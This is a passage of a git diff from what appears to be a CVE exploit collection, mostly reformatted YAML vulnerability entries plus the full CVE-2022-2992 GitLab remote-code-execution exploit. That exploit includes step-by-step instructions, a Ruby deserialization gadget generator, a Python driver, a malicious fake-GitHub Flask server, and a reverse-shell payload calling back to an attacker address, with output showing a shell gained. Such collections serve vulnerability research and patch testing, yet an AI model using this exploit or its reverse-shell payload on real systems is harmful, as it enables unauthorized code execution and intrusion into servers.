https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef@%3Cusers.solr.apache.org%3E + - https://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699@%3Cissues.lucene.apache.org%3E + - https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E + - https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E + - https://lists.debian.org/debian-lts-announce/2019/10/msg00013.html + - https://lists.debian.org/debian-lts-announce/2020/08/msg00025.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2019-0193 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: 对生成代码的控制不恰当, 代码注入 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore b/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/LICENSE b/cve/apache-tomcat/2020/CVE-2020-13935/LICENSE old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/README.md b/cve/apache-tomcat/2020/CVE-2020-13935/README.md old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/go.mod b/cve/apache-tomcat/2020/CVE-2020-13935/go.mod old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/go.sum b/cve/apache-tomcat/2020/CVE-2020-13935/go.sum old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/main.go b/cve/apache-tomcat/2020/CVE-2020-13935/main.go old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2022/CVE-2022-29885/CVE-2022-29885.go b/cve/apache-tomcat/2022/CVE-2022-29885/CVE-2022-29885.go old mode 100755 new mode 100644 diff --git a/cve/apache-tomcat/2022/CVE-2022-29885/README.md b/cve/apache-tomcat/2022/CVE-2022-29885/README.md old mode 100755 new mode 100644 
diff --git a/cve/docker/2023/yaml/CVE-2022-37708.yaml b/cve/docker/2023/yaml/CVE-2022-37708.yaml index 85eb7605ee4a9388402e254b99907b734df7f7b6..e1b6e56dfa086417b84b2deee57cfa6f4066f5ea 100644 --- a/cve/docker/2023/yaml/CVE-2022-37708.yaml +++ b/cve/docker/2023/yaml/CVE-2022-37708.yaml @@ -1,23 +1,23 @@ -id: CVE-2022-37708 -source: - https://github.com/thekevinday/docker_lightman_exploit -info: - name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 - severity: medium - description: | - Docker版本20.10.15(build fd82621)易受不安全权限的攻击。Docker容器外的未授权用户可以访问Docker容器内的任何文件。 - scope-of-influence: - Docker 20.10.15, build fd82621 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-37708 - - https://www.docker.com/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37708 - - https://github.com/orgs/docker/repositories - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N - cvss-score: 6.8 - cve-id: CVE-2022-37708 - cwe-id: CWE-732 - cnvd-id: None - kve-id: None +id: CVE-2022-37708 +source: + https://github.com/thekevinday/docker_lightman_exploit +info: + name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。 + severity: medium + description: | + Docker版本20.10.15(build fd82621)易受不安全权限的攻击。Docker容器外的未授权用户可以访问Docker容器内的任何文件。 + scope-of-influence: + Docker 20.10.15, build fd82621 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-37708 + - https://www.docker.com/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37708 + - https://github.com/orgs/docker/repositories + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N + cvss-score: 6.8 + cve-id: CVE-2022-37708 + cwe-id: CWE-732 + cnvd-id: None + kve-id: None tags: 未授权访问 \ No newline at end of file 
diff --git a/cve/gitlab/2020/yaml/CVE-2020-10977.yaml b/cve/gitlab/2020/yaml/CVE-2020-10977.yaml index 11c4e937e25f37b131d0a635ee80c78ccd8a564a..588a5e374550ea6cc9de77248045a914b71b275d 100644 --- a/cve/gitlab/2020/yaml/CVE-2020-10977.yaml +++ b/cve/gitlab/2020/yaml/CVE-2020-10977.yaml @@ -1,20 +1,20 @@ -id: CVE-2020-10977 -source: https://github.com/thewhiteh4t/cve-2020-10977 -info: - name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 - severity: MEDIUM - description: | - GitLab EE/CE 8.5 到 12.9 在项目之间移动问题时容易受到路径遍历的影响。 - scope-of-influence: - 8.5.0 <= GitLab(CE/EE)< 12.9 - 8.5.0 <= GitLab(CE/EE)< 12.9 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-10977 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2020-10977 - cwe-id: CWE-22 - cnvd-id: None - kve-id: None +id: CVE-2020-10977 +source: https://github.com/thewhiteh4t/cve-2020-10977 +info: + name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 + severity: MEDIUM + description: | + GitLab EE/CE 8.5 到 12.9 在项目之间移动问题时容易受到路径遍历的影响。 + scope-of-influence: + 8.5.0 <= GitLab(CE/EE)< 12.9 + 8.5.0 <= GitLab(CE/EE)< 12.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-10977 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2020-10977 + cwe-id: CWE-22 + cnvd-id: None + kve-id: None tags: EE/CE, cve2020, gitlab \ No newline at end of file diff --git a/cve/gitlab/2022/CVE-2022-2992/README.md b/cve/gitlab/2022/CVE-2022-2992/README.md index 59776cd62898ecf3995ec4d507301dc4c67efde5..282e156ffd0359bb75eb4cd4d39f28c2c63f9c3f 100644 --- a/cve/gitlab/2022/CVE-2022-2992/README.md +++ b/cve/gitlab/2022/CVE-2022-2992/README.md 
@@ -1,97 +1,97 @@ -# CVE-2022-2992 -Authenticated Remote Command Execution in Gitlab via GitHub import. -> A vulnerability in GitLab CE/EE affecting all versions from 11.10 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. - -https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#remote-command-execution-via-github-import - -## Prerequisites -- [Ngrok](https://ngrok.com/) -- Ruby -- Redis -- Python3 -- Flask -``` -sudo apt install ruby python3 python3-pip -gem install redis -pip install flask -``` ---- -## Steps -1) Run `./ngrok http 5000` and save the URL. -2) Now to generate the serialized payload run [payload_gen.rb](https://github.com/CsEnox/CVE-2022-2992/blob/main/payload_gen.rb) and save the payload. Below is an example: -```bash -ruby payload_gen.rb 'bash -c "sh -i >& /dev/tcp/172.16.128.129/443 0>&1"' -``` -3) In [server.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/server.py) update NGROK_URL and PAYLOAD variables accordingly. Below is an example: -```py -PAYLOAD = 'ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$359\r\n\u0004\b[\bc\u0015Gem::SpecFetcherc\u0013Gem::InstallerU:\u0015Gem::Requirement[\u0006o:\u001cGem::Package::TarReader\u0006:\b@ioo:\u0014Net::BufferedIO\u0007;\u0007o:#Gem::Package::TarReader::Entry\u0007:\n@readi\u0000:\f@headerI\"\baaa\u0006:\u0006ET:\u0012@debug_outputo:\u0016Net::WriteAdapter\u0007:\f@socketo:\u0014Gem::RequestSet\u0007:\n@setso;\u000e\u0007;\u000fm\u000bKernel:\u000f@method_id:\u000bsystem:\r@git_setI\"8bash -c \"sh -i >& /dev/tcp/172.16.128.129/443 0>&1\"\u0006;\fT;\u0012:\fresolve' -NGROK_URL = 'https://dc09-41-01-99-69.in.ngrok.io' -``` -4) Create an access token for the user on gitlab and select all scopes. 
Please read the documentation [here](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html) -5) Finally firing off our [exploit.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/exploit.py). - -**NOTE**: Before running make sure ngrok and flask server are running. -```py -python3 exploit.py -a lunpy-AMEuQE66KcUtNhcharjm5 -u https://dc09-41-01-99-69.in.ngrok.io -t http://gitlab.example -``` -- We get a shell back on port 443 -```bash -➜ CVE-2022-2992: nc -nlvp 443 -listening on [any] 443 ... -connect to [172.16.128.129] from (UNKNOWN) [172.16.128.180] 40270 -sh: 0: can't access tty; job control turned off -$ id -uid=998(git) gid=998(git) groups=998(git) -``` - ---- -### Expected output in each window: -- Ngrok -```http -POST /vakzz/public.git/git-upload-pack 200 OK -GET /vakzz/public.git/info/refs 200 OK -GET /api/v3/repos/fake/name 200 OK -GET /api/v3/repositories/12345 200 OK -GET /api/v3/rate_limit 200 OK -GET /api/v3/rate_limit 200 OK -``` -- Exploit -```py -[1] Creating Group -[+] Successfully created group: qogjohpykk -[2] Running flask server -[3] Importing Github Repo - * Serving Flask app "server" (lazy loading) - * Environment: production - WARNING: This is a development server. Do not use it in a production deployment. - Use a production WSGI server instead. 
- * Debug mode: off - * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit) -127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/repositories/12345 HTTP/1.1" 200 - -201 -127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /vakzz/public.git/info/refs?service=git-upload-pack HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:04] "POST /vakzz/public.git/git-upload-pack HTTP/1.1" 200 - -127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /api/v3/repos/fake/name HTTP/1.1" 200 - -[4] Triggering Payload -[+] Command was executed -``` ---- - -## Environment -- Tested on Gitlab 15.3.1 Enterprise Edition -- For building your own environment for testing, copy the [data](https://github.com/CsEnox/CVE-2022-2992/tree/main/data) directory to `/` on your Linux VM. -- Run build.sh to setup the environment. Once the script finishes executing you can login using the following credentials on gitlab. -``` -Username: enox -Email: enox@gitlab.example -Password: StrongestGitlabPassword -``` ---- - -## Credits -- https://hackerone.com/reports/1679624 (vakzz) -- https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html - -If you have any questions reach out to me on [Discord](https://discord.com/) (Enox#4458) +# CVE-2022-2992 +Authenticated Remote Command Execution in Gitlab via GitHub import. +> A vulnerability in GitLab CE/EE affecting all versions from 11.10 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. 
+ +https://about.gitlab.com/releases/2022/08/30/critical-security-release-gitlab-15-3-2-released/#remote-command-execution-via-github-import + +## Prerequisites +- [Ngrok](https://ngrok.com/) +- Ruby +- Redis +- Python3 +- Flask +``` +sudo apt install ruby python3 python3-pip +gem install redis +pip install flask +``` +--- +## Steps +1) Run `./ngrok http 5000` and save the URL. +2) Now to generate the serialized payload run [payload_gen.rb](https://github.com/CsEnox/CVE-2022-2992/blob/main/payload_gen.rb) and save the payload. Below is an example: +```bash +ruby payload_gen.rb 'bash -c "sh -i >& /dev/tcp/172.16.128.129/443 0>&1"' +``` +3) In [server.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/server.py) update NGROK_URL and PAYLOAD variables accordingly. Below is an example: +```py +PAYLOAD = 'ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$359\r\n\u0004\b[\bc\u0015Gem::SpecFetcherc\u0013Gem::InstallerU:\u0015Gem::Requirement[\u0006o:\u001cGem::Package::TarReader\u0006:\b@ioo:\u0014Net::BufferedIO\u0007;\u0007o:#Gem::Package::TarReader::Entry\u0007:\n@readi\u0000:\f@headerI\"\baaa\u0006:\u0006ET:\u0012@debug_outputo:\u0016Net::WriteAdapter\u0007:\f@socketo:\u0014Gem::RequestSet\u0007:\n@setso;\u000e\u0007;\u000fm\u000bKernel:\u000f@method_id:\u000bsystem:\r@git_setI\"8bash -c \"sh -i >& /dev/tcp/172.16.128.129/443 0>&1\"\u0006;\fT;\u0012:\fresolve' +NGROK_URL = 'https://dc09-41-01-99-69.in.ngrok.io' +``` +4) Create an access token for the user on gitlab and select all scopes. Please read the documentation [here](https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html) +5) Finally firing off our [exploit.py](https://github.com/CsEnox/CVE-2022-2992/blob/main/exploit.py). + +**NOTE**: Before running make sure ngrok and flask server are running. 
+```py +python3 exploit.py -a lunpy-AMEuQE66KcUtNhcharjm5 -u https://dc09-41-01-99-69.in.ngrok.io -t http://gitlab.example +``` +- We get a shell back on port 443 +```bash +➜ CVE-2022-2992: nc -nlvp 443 +listening on [any] 443 ... +connect to [172.16.128.129] from (UNKNOWN) [172.16.128.180] 40270 +sh: 0: can't access tty; job control turned off +$ id +uid=998(git) gid=998(git) groups=998(git) +``` + +--- +### Expected output in each window: +- Ngrok +```http +POST /vakzz/public.git/git-upload-pack 200 OK +GET /vakzz/public.git/info/refs 200 OK +GET /api/v3/repos/fake/name 200 OK +GET /api/v3/repositories/12345 200 OK +GET /api/v3/rate_limit 200 OK +GET /api/v3/rate_limit 200 OK +``` +- Exploit +```py +[1] Creating Group +[+] Successfully created group: qogjohpykk +[2] Running flask server +[3] Importing Github Repo + * Serving Flask app "server" (lazy loading) + * Environment: production + WARNING: This is a development server. Do not use it in a production deployment. + Use a production WSGI server instead. + * Debug mode: off + * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit) +127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/rate_limit HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:03] "GET /api/v3/repositories/12345 HTTP/1.1" 200 - +201 +127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /vakzz/public.git/info/refs?service=git-upload-pack HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:04] "POST /vakzz/public.git/git-upload-pack HTTP/1.1" 200 - +127.0.0.1 - - [08/Oct/2022 23:46:04] "GET /api/v3/repos/fake/name HTTP/1.1" 200 - +[4] Triggering Payload +[+] Command was executed +``` +--- + +## Environment +- Tested on Gitlab 15.3.1 Enterprise Edition +- For building your own environment for testing, copy the [data](https://github.com/CsEnox/CVE-2022-2992/tree/main/data) directory to `/` on your Linux VM. +- Run build.sh to setup the environment. 
Once the script finishes executing you can login using the following credentials on gitlab. +``` +Username: enox +Email: enox@gitlab.example +Password: StrongestGitlabPassword +``` +--- + +## Credits +- https://hackerone.com/reports/1679624 (vakzz) +- https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html + +If you have any questions reach out to me on [Discord](https://discord.com/) (Enox#4458) diff --git a/cve/gitlab/2022/CVE-2022-2992/exploit.py b/cve/gitlab/2022/CVE-2022-2992/exploit.py index 63d30a441ced2534b054c21805a28b70d3559f0e..e59f5de0565e42caaaa4365bc64c67ac173e17d4 100644 --- a/cve/gitlab/2022/CVE-2022-2992/exploit.py +++ b/cve/gitlab/2022/CVE-2022-2992/exploit.py 
@@ -1,52 +1,52 @@ -import requests -import time -import random -import string -import argparse -import threading -from server import * - -parser = argparse.ArgumentParser(description='CVE-2022-2992 - Gitlab Authenticated RCE via Github Import') -parser.add_argument('-a', help='Auth-Token', required=True) -parser.add_argument('-u', help='Attacker Repo URL (Eg: https://ba20-40-33-92-70.in.ngrok.io)', required=True) -parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) -args = parser.parse_args() - -auth_token = args.a -gitlab_url = args.t -attacker_url = args.u - -session = requests.Session() - -print("[1] Creating Group") -group_name =''.join(random.choices(string.ascii_lowercase, k=10)) -headers = {'PRIVATE-TOKEN': auth_token} -data = {'name':group_name,'path':group_name,'visibility':'public'} -r = session.post(gitlab_url+"/api/v4/groups", headers=headers, data=data) - -if r.status_code != 201: - print(r.text) - exit("Failed to create group, check your auth token.") -else: - print("[+] Successfully created group: "+group_name) - -print("[2] Running flask server") -def runserver(): - app.run(host='0.0.0.0', port='5000', debug=False) -t1 = threading.Thread(target=runserver) -t1.start() - -print("[3] Importing Github Repo") -data= {'personal_access_token':'fake_token','repo_id':'12345','target_namespace':group_name,'new_name':'gh-import-420','github_hostname':attacker_url} -r = session.post(gitlab_url+"/api/v4/import/github",headers=headers,data=data) -print(r.status_code) -time.sleep(5) - -print("[4] Triggering Payload") -headers = {'Cookie':'_gitlab_session=gggg'} -r = session.get(gitlab_url+"/"+group_name, headers=headers) - -if r.status_code != 500: - exit("[-] Exploit failed") -else: - print("[+] Command was executed") +import requests +import time +import random +import string +import argparse +import threading +from server import * + +parser = argparse.ArgumentParser(description='CVE-2022-2992 - Gitlab Authenticated RCE via 
Github Import') +parser.add_argument('-a', help='Auth-Token', required=True) +parser.add_argument('-u', help='Attacker Repo URL (Eg: https://ba20-40-33-92-70.in.ngrok.io)', required=True) +parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) +args = parser.parse_args() + +auth_token = args.a +gitlab_url = args.t +attacker_url = args.u + +session = requests.Session() + +print("[1] Creating Group") +group_name =''.join(random.choices(string.ascii_lowercase, k=10)) +headers = {'PRIVATE-TOKEN': auth_token} +data = {'name':group_name,'path':group_name,'visibility':'public'} +r = session.post(gitlab_url+"/api/v4/groups", headers=headers, data=data) + +if r.status_code != 201: + print(r.text) + exit("Failed to create group, check your auth token.") +else: + print("[+] Successfully created group: "+group_name) + +print("[2] Running flask server") +def runserver(): + app.run(host='0.0.0.0', port='5000', debug=False) +t1 = threading.Thread(target=runserver) +t1.start() + +print("[3] Importing Github Repo") +data= {'personal_access_token':'fake_token','repo_id':'12345','target_namespace':group_name,'new_name':'gh-import-420','github_hostname':attacker_url} +r = session.post(gitlab_url+"/api/v4/import/github",headers=headers,data=data) +print(r.status_code) +time.sleep(5) + +print("[4] Triggering Payload") +headers = {'Cookie':'_gitlab_session=gggg'} +r = session.get(gitlab_url+"/"+group_name, headers=headers) + +if r.status_code != 500: + exit("[-] Exploit failed") +else: + print("[+] Command was executed") diff --git a/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb b/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb index 62ec1228a6fb6b2b7f5af1f7f3310174dcd83ed6..a29e95a62ed5c09022d5b144683602a32a34df7e 100644 --- a/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb +++ b/cve/gitlab/2022/CVE-2022-2992/payload_gen.rb 
@@ -1,49 +1,49 @@ -require 'redis' -require 'json' -# NOTE: Made by vakzz I only made some minor changes - - -if ARGV.length < 1 - puts "[!] Please pass command argument" - puts 'Example: ruby payload.rb "whoami > /tmp/test"' - exit -end - -# Autoload the required classes -Gem::SpecFetcher -Gem::Installer - -# prevent the payload from running when we Marshal.dump it -module Gem - class Requirement - def marshal_dump - [@requirements] - end - end -end - -wa1 = Net::WriteAdapter.new(Kernel, :system) - -rs = Gem::RequestSet.allocate -rs.instance_variable_set('@sets', wa1) -rs.instance_variable_set('@git_set', "#{ARGV[0]}") - -wa2 = Net::WriteAdapter.new(rs, :resolve) - -i = Gem::Package::TarReader::Entry.allocate -i.instance_variable_set('@read', 0) -i.instance_variable_set('@header', 'aaa') - -n = Net::BufferedIO.allocate -n.instance_variable_set('@io', i) -n.instance_variable_set('@debug_output', wa2) - -t = Gem::Package::TarReader.allocate -t.instance_variable_set('@io', n) - -r = Gem::Requirement.allocate -r.instance_variable_set('@requirements', t) - -payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r]) -a = "ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$"+((payload.length).to_s)+"\r\n"+payload -puts a.to_json +require 'redis' +require 'json' +# NOTE: Made by vakzz I only made some minor changes + + +if ARGV.length < 1 + puts "[!] 
Please pass command argument" + puts 'Example: ruby payload.rb "whoami > /tmp/test"' + exit +end + +# Autoload the required classes +Gem::SpecFetcher +Gem::Installer + +# prevent the payload from running when we Marshal.dump it +module Gem + class Requirement + def marshal_dump + [@requirements] + end + end +end + +wa1 = Net::WriteAdapter.new(Kernel, :system) + +rs = Gem::RequestSet.allocate +rs.instance_variable_set('@sets', wa1) +rs.instance_variable_set('@git_set', "#{ARGV[0]}") + +wa2 = Net::WriteAdapter.new(rs, :resolve) + +i = Gem::Package::TarReader::Entry.allocate +i.instance_variable_set('@read', 0) +i.instance_variable_set('@header', 'aaa') + +n = Net::BufferedIO.allocate +n.instance_variable_set('@io', i) +n.instance_variable_set('@debug_output', wa2) + +t = Gem::Package::TarReader.allocate +t.instance_variable_set('@io', n) + +r = Gem::Requirement.allocate +r.instance_variable_set('@requirements', t) + +payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r]) +a = "ggg\r\n*3\r\n$3\r\nset\r\n$19\r\nsession:gitlab:gggg\r\n$"+((payload.length).to_s)+"\r\n"+payload +puts a.to_json diff --git a/cve/gitlab/2022/CVE-2022-2992/server.py b/cve/gitlab/2022/CVE-2022-2992/server.py index 7e8db2e5e2de854fe28165015331d65628d30e5d..9e871bf7746231d4c3b5efe4d5e6caa8ba427e2e 100644 --- a/cve/gitlab/2022/CVE-2022-2992/server.py +++ b/cve/gitlab/2022/CVE-2022-2992/server.py 
@@ -1,92 +1,92 @@ -from flask import Flask, request, Response, send_file, jsonify -import requests -import json -# Made by vakzz -HTTP_METHODS = [ - "GET", - "HEAD", - "POST", - "PUT", - "DELETE", - "CONNECT", - "OPTIONS", - "TRACE", - "PATCH", -] -app = Flask(__name__) - -# NOTE: Update these 2 variables -PAYLOAD = '' -NGROK_URL = '' - - -REPO_JSON = { - "id": 12345, - "name": "fake", - "full_name": "fake/name", - "clone_url": NGROK_URL + "/vakzz/public.git", -} - - -@app.route("/vakzz/public.git/info/refs") -def git_refs(): - return ( - b"001e# service=git-upload-pack\n00000154b5e17b851383bcee012364d0df7b67a3c4797b73 HEAD\x00multi_ack thin-pack side-band side-band-64k ofs-delta shallow deepen-since deepen-not deepen-relative no-progress include-tag multi_ack_detailed allow-tip-sha1-in-want allow-reachable-sha1-in-want no-done symref=HEAD:refs/heads/main filter object-format=sha1 agent=git/github-g04ce7e352669\n003db5e17b851383bcee012364d0df7b67a3c4797b73 refs/heads/main\n0000", - 200, - {"Content-Type": "application/x-git-upload-pack-advertisement"}, - ) - - -@app.route("/vakzz/public.git/git-upload-pack", methods=["POST"]) -def git_pack(): - return ( - b'0008NAK\n0023\x02Enumerating objects: 3, done.\n0022\x02Counting objects: 33% (1/3)\r0022\x02Counting objects: 66% (2/3)\r0022\x02Counting objects: 100% (3/3)\r0029\x02Counting objects: 100% (3/3), done.\n0265\x01PACK\x00\x00\x00\x02\x00\x00\x00\x03\x9a(x\x9cmR\xcbn\xa3@\x00\xbb\xf3\x15sG\xdb0\xbc\x91\xdaUg(\x05\xb6\xc9\x00i\x08io<\xc20\x84Gx\x87|\xfdv\xb7\xd7\xfaf\xcb\x96,\xd9c\x7f>\x83L\xceu\xa8\xa5\x9a\x90\xe6\xb9\x9e\xe7R\x92&r\x96f\x86b\x18\x8a.\xe6\xb1\n\xb3\x14\x8a9\xe4\xe2i,\xda\x1eD\xac\xaaX\\\x03\xdc.\x15k(x\\\xbe\x84\xe7%\xf9\xa6\x0f\xac\xc9\xdb\xdf\x00\xaa*\x94d(+*\xe0\xa1 
\x08\\\xda\xd65\x1b\xc7s\x0fl6:S\x02\x1e\x9b\xb6?_\xab\xf5\x99\xb2\xb1\x98\x92\x87/\xc3\x0f1z\xa5\x03\xa3\xe0\xd7?`\xcbv\t\xf0m\x1f\xbc\xbb6A\x87po\xfd\xd79\xc0\x81e\xc0)F\x08\x9b\x08\x058\xf8Sb\xaa\x07\xe6\x1e\xbfiE){\xb3\xd4\xbb\x0bB3\r\\\xe4t\xcb\x1b\xcd\xd96W\xeac\xfe\x11\xdb\x05\x9f\xbdB\xbe\xe3\x80"\xd2H\x8f\x8e\xcc\xa4:\xf9\xdct\xc3\x88Y\xa8_.\xa7tht\xb5B\xa8\x13\x96\n\x1f\xe4jt\xe1\xea\xf9\x1f\xbcVf7\x85\x85\xe3\xb1\xd9\x96\xedHt\x0e\xd8\xd7y\x8b\xe4\xcfY\xd4\x93\xbb\xb8\xf9\x14=\xff\x10D)\x8e\x87Lz\xado\xeb2m2\xe8\xf4W\x8a\x02\xc2\xf6u\x946\xcb\xf5\xd4C\xcb\xb6\xadN%\xd3]\xe5@:%\x1a\x81\xea\xbe\xc6\xd4\x98\x1a\xf1\x8f\xb4+w\x06,nf\xca*\x1a\x94+\xf3\xa2\xb5U\xc5\xa3\x7f\xaaH\x1b_\xc2;<\x1en\x1bB\x19\xcd\xb2\xc5\xe0\'\x0e\x08\xda\x18#\'\xf7/\xba\xb5\xa7\x86\xe0\xf1\xb50k\xc7\x9btK\xca\xb3I\x82\xa2\x08\xe7]%\r}7\xedb=\x0cO\xd8\x94}{%\xfd\xee\xfdP\xdd\xed\xac\xfe\xea\x80\xcd\x8b\xcb\xb7y\xbd\xf3\xb2\xaaQ\xd8@\xf8\xed\xac+\x92_F\xd2^v\x9c\xd4\x14\xca"\xac?\xae\x9b;I\xf9\xd5|K$\xcd\xec^\xc6\xc0\tm\xabFO\x1cx\xf2\x02\xe9\x95\xfb\xde\xcc"/?/\xc6\xb9\r\x1bY\\\x81\xefc\xfc\x05\xc7\xd4\xcb\x13\xa5\x02x\x9c340031Q\x08rut\xf1u\xd5\xcbMa8\x96\x983g{\xab\xdfn\x86\xe6\xe7\xc2\xd9fo\x9f~\x7f\x94\xe5\x04\x00\xe1!\x0e\xe6=x\x9cSV((M\xca\xc9L\xe6JLL\xe4\x02\x00\x1c^\x03\xfa\xd2_\xcc\xa1\xa6\x81\xa3\xb6\xeeSL\x96\t\x0c\xb4\xf8\xb7>\xa90006\x01\xf8003a\x02Total 3 (delta 0), reused 0 (delta 0), pack-reused 0\n0000', - 200, - {"Content-Type": "application/x-git-upload-pack-result"}, - ) - - -@app.before_request -def log_request(): - app.logger.debug("Request Path %s", request.path) - app.logger.debug("Request Data %s", request.data) - return None - - -@app.route("/repositories/12345") -def repo(): - return jsonify(REPO_JSON) - - -@app.route("/api/v3/repositories/12345") -def repo_legacy(): - return jsonify(REPO_JSON) - - -@app.route("/api/v3/repos/fake/name") -def repo_info(): - return jsonify( - { - "default_branch": { - "to_s": { - "to_s": PAYLOAD, - "bytesize": 3, - } - } - } 
- ) - - -@app.route("/api/v3/rate_limit") -def rate_limit(): - return ( - jsonify({}), - 200, - {"X-RateLimit-Limit": "100000", "X-RateLimit-Remaining": "100000"}, - ) - - -@app.route("/", defaults={"path": ""}, methods=HTTP_METHODS) -@app.route("/", methods=HTTP_METHODS) -def proxy(path): - return jsonify({}) +from flask import Flask, request, Response, send_file, jsonify +import requests +import json +# Made by vakzz +HTTP_METHODS = [ + "GET", + "HEAD", + "POST", + "PUT", + "DELETE", + "CONNECT", + "OPTIONS", + "TRACE", + "PATCH", +] +app = Flask(__name__) + +# NOTE: Update these 2 variables +PAYLOAD = '' +NGROK_URL = '' + + +REPO_JSON = { + "id": 12345, + "name": "fake", + "full_name": "fake/name", + "clone_url": NGROK_URL + "/vakzz/public.git", +} + + +@app.route("/vakzz/public.git/info/refs") +def git_refs(): + return ( + b"001e# service=git-upload-pack\n00000154b5e17b851383bcee012364d0df7b67a3c4797b73 HEAD\x00multi_ack thin-pack side-band side-band-64k ofs-delta shallow deepen-since deepen-not deepen-relative no-progress include-tag multi_ack_detailed allow-tip-sha1-in-want allow-reachable-sha1-in-want no-done symref=HEAD:refs/heads/main filter object-format=sha1 agent=git/github-g04ce7e352669\n003db5e17b851383bcee012364d0df7b67a3c4797b73 refs/heads/main\n0000", + 200, + {"Content-Type": "application/x-git-upload-pack-advertisement"}, + ) + + +@app.route("/vakzz/public.git/git-upload-pack", methods=["POST"]) +def git_pack(): + return ( + b'0008NAK\n0023\x02Enumerating objects: 3, done.\n0022\x02Counting objects: 33% (1/3)\r0022\x02Counting objects: 66% (2/3)\r0022\x02Counting objects: 100% (3/3)\r0029\x02Counting objects: 100% (3/3), 
